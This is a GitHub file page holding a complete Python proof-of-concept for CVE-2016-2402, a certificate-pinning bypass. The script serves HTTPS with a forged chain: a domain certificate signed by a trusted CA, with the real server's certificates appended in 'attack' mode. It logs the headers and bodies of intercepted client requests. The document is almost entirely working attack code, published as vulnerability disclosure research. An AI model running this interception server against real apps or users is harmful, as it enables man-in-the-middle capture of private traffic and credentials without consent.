-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathcert-pinning-flaw-poc.py
executable file
·144 lines (116 loc) · 5.7 KB
/
cert-pinning-flaw-poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
#!/usr/bin/python3
# John Kozyrakis
import tempfile
from http.server import BaseHTTPRequestHandler, HTTPServer
import ssl
import argparse
import logging
import os
import sys
from OpenSSL import crypto, SSL
import socket
class ServerHandler(BaseHTTPRequestHandler):
    """Request handler that logs whatever the intercepted client sends.

    Neither handler writes an HTTP response; they only log the request so the
    operator can see that the client's traffic reached this server.
    """

    def do_GET(self):
        """Log the request line and headers of an intercepted GET request."""
        logging.debug("intercepted GET request. If you see data from the client here, the attack worked.")
        self.log_request()
        logging.debug(self.headers)

    def do_POST(self):
        """Log an intercepted POST request.

        Headers and body are logged as well, unless the request path contains
        the substring "tracking".
        """
        logging.debug("")
        logging.debug(
            "intercepted POST request to %s. If you see data from the client here, the attack worked." % self.path)
        self.log_request()
        if "tracking" in self.path:
            return
        logging.debug(self.headers)
        length = self._content_length()
        # Never call read() with a non-positive size: a negative size would
        # block until the peer closes the connection.
        content = self.rfile.read(length) if length > 0 else b""
        logging.debug(content)

    def _content_length(self):
        """Return the declared body length, or 0 when it is missing or invalid."""
        raw_length = self.headers.get('Content-Length')
        if raw_length is None:
            return 0
        try:
            return max(int(raw_length), 0)
        except (TypeError, ValueError):
            logging.warning("Ignoring invalid Content-Length header: %r", raw_length)
            return 0
def gen_malicious_chain(domain):
    """Write the certificate chain served for *domain* into the temp chain file.

    The file receives, in order: a freshly generated end-entity certificate
    for *domain* signed by the configured CA, that certificate's private key,
    and (only when ``args.mode == 'attack'``) the certificates presented by
    the real server on port 443.

    Relies on the module-level ``CA_CERT``, ``CA_KEY``, ``args`` and
    ``tempMaliciousChainFile``. The CA files are resolved relative to the
    directory containing this script.
    """
    script_dir = os.path.dirname(__file__)

    # load CA certificate and key (context managers so the handles are closed)
    with open(os.path.join(script_dir, CA_CERT)) as ca_cert_file:
        trusted_ca_cert = crypto.load_certificate(crypto.FILETYPE_PEM, ca_cert_file.read())
    with open(os.path.join(script_dir, CA_KEY)) as ca_key_file:
        trusted_ca_key = crypto.load_privatekey(crypto.FILETYPE_PEM, ca_key_file.read())

    # generate a new end-entity certificate for a given domain signed by our trusted CA
    [(end_entity_cert, end_entity_key)] = generate_end_entity_cert(domain, trusted_ca_cert, trusted_ca_key)
    tempMaliciousChainFile.write(crypto.dump_certificate(crypto.FILETYPE_PEM, end_entity_cert))
    tempMaliciousChainFile.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, end_entity_key))
    logging.debug("Generated end-entity cert & key, signed by the provided CA. Adding these to the malicious chain")

    # A peer may present no chain at all; treat that as an empty list.
    upstream_certs = get_upstream_certs(domain, 443) or []
    logging.info("Retrieved the certificates used by the real %s (%s in total)" % (domain, len(upstream_certs)))

    if args.mode == 'attack':
        for cert in upstream_certs:
            tempMaliciousChainFile.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
        logging.info("The upstream certificates WILL be added to the malicious client chain")
    else:
        logging.info("The upstream certificates will NOT be added to the malicious client chain")

    # The chain file is later opened by name, so buffered writes must reach
    # the disk before this function returns.
    tempMaliciousChainFile.flush()
def generate_end_entity_cert(domain, cacert, cakey):
    """Create a one-year RSA-2048 certificate for *domain* issued by the given CA.

    Args:
        domain: Host name placed in the certificate subject's CN.
        cacert: CA certificate whose subject becomes the issuer.
        cakey: CA private key used to sign the new certificate.

    Returns:
        A single-element list ``[(certificate, private_key)]``.
    """
    skey = crypto.PKey()
    skey.generate_key(crypto.TYPE_RSA, 2048)

    scert = crypto.X509()
    scert.get_subject().CN = domain  # This is where the domain fits
    scert.set_issuer(cacert.get_subject())
    scert.gmtime_adj_notBefore(0)
    scert.gmtime_adj_notAfter(365 * 24 * 60 * 60)
    # Serial numbers must be positive and unique per issuer; a constant 0 is
    # neither. "| 1" guarantees the random value is never zero.
    scert.set_serial_number(int.from_bytes(os.urandom(16), "big") | 1)
    scert.set_pubkey(skey)
    # SHA-1 signatures are rejected by current TLS stacks; sign with SHA-256.
    scert.sign(cakey, "sha256")
    return [(scert, skey)]
def get_upstream_certs(host, port):
    """Connect to ``host:port`` over TLS and return the certificates it presents.

    Args:
        host: Host name to connect to; also sent as the SNI server name.
        port: TCP port to connect to.

    Returns:
        The value of ``get_peer_cert_chain()`` for the completed handshake.

    On a connection or handshake failure the error is logged and
    ``cleanup()`` is called, which terminates the program.
    """
    context = SSL.Context(SSL.SSLv23_METHOD)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connection = SSL.Connection(context, sock)
    try:
        # Send SNI so name-based virtual hosts return the chain for this
        # domain rather than a default certificate.
        connection.set_tlsext_host_name(host.encode("idna"))
        connection.connect((host, port))
        connection.do_handshake()
        return connection.get_peer_cert_chain()
    except SSL.WantReadError:
        logging.error("Timeout")
        cleanup()
    except (SSL.Error, OSError):
        logging.exception("Could not retrieve certificates from %s:%s" % (host, port))
        cleanup()
    finally:
        # Runs on success and on the SystemExit raised by cleanup().
        sock.close()
def cleanup():
    """Close the temporary chain file if it exists, then exit with status 1.

    This can be called before the module-level ``tempMaliciousChainFile`` has
    been created (for example when argument validation fails), so the file is
    looked up defensively instead of being referenced directly.
    """
    temp_file = globals().get("tempMaliciousChainFile")
    if temp_file is not None:
        temp_file.close()
    logging.error("Exiting")
    sys.exit(1)
# Script body: parse the command line, build the malicious chain file and
# serve HTTPS with it until interrupted.
logging.basicConfig(level=logging.DEBUG)
logging.info("Certificate Pinning bypass POC - CVE-2016-2402 - https://koz.io/pinning-cve-2016-2402")

parser = argparse.ArgumentParser(
    prog='Certificate Pinning bypass POC',
    description='''This utility will set up a HTTPS server that uses a malicious certificate chain for a specific domain.
If traffic of a vulnerable app is redirected to this server, certificate pinning for that domain will bypassed.
See https://koz.io/pinning-cve-2016-2402 for more details.''',
    epilog='''@ikoz - John Kozyrakis''')
parser.add_argument("-d", "--domain", help="Domain name to be intercepted", required=True)
parser.add_argument("-p", "--port", help="Web server port number", type=int, default=443)
parser.add_argument("-c", "--cacert", help="CA certificate that the host system trusts (PEM)", default="CA_CERT.pem")
parser.add_argument("-k", "--cakey", help="Private key of CA that the host system trusts (PEM)", default="CA_KEY.pem")
parser.add_argument("-m", "--mode", help="Add upstream certificates to chain (or not)",
                    choices=['attack', 'no-attack'], required=True)
# NOTE(review): --verbose is accepted but nothing below reads it; the log
# level is always DEBUG.
parser.add_argument("-v", "--verbose", help="increase output verbosity",
                    action="store_true")
args = parser.parse_args()

logging.info("Will intercept domain %s" % args.domain)
logging.info("Will use CA certificate %s with private key %s" % (args.cacert, args.cakey))

CA_CERT = args.cacert  # certificate of CA that the host system trusts
CA_KEY = args.cakey  # private key of CA that the host system trusts

# Created before validation because cleanup() closes this file.
tempMaliciousChainFile = tempfile.NamedTemporaryFile()

# gen_malicious_chain() loads the CA files relative to this script's
# directory, so validate that same location (absolute paths are unaffected).
script_dir = os.path.dirname(__file__)
if not os.path.isfile(os.path.join(script_dir, CA_CERT)):
    logging.error("CA_CERT %s is not a valid file" % CA_CERT)
    cleanup()
if not os.path.isfile(os.path.join(script_dir, CA_KEY)):
    logging.error("CA_KEY %s is not a valid file" % CA_KEY)
    cleanup()

gen_malicious_chain(args.domain)

logging.info(
    "Starting web server - listening at port %s. Redirecting traffic for %s to this server will bypass any pinning and "
    "show the requests here" % (
        args.port, args.domain))
logging.info("Use Ctrl+C to stop the server")

try:
    httpd = HTTPServer(("localhost", args.port), ServerHandler)
except PermissionError:
    logging.error("PermissionError: Cannot start server on port %s. Please use sudo or a port >1024" % args.port)
    cleanup()
except Exception:
    # Not a bare "except:" so SystemExit / KeyboardInterrupt pass through.
    logging.exception("Exception")
    cleanup()

# The chain file is read by name below; make sure everything written to it
# has actually reached the disk.
tempMaliciousChainFile.flush()

# ssl.wrap_socket() was removed in Python 3.12; use an SSLContext instead.
tls_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
tls_context.load_cert_chain(certfile=tempMaliciousChainFile.name)
httpd.socket = tls_context.wrap_socket(httpd.socket, server_side=True)

try:
    httpd.serve_forever()
except KeyboardInterrupt:
    logging.info("Stopping server")
finally:
    httpd.server_close()
    tempMaliciousChainFile.close()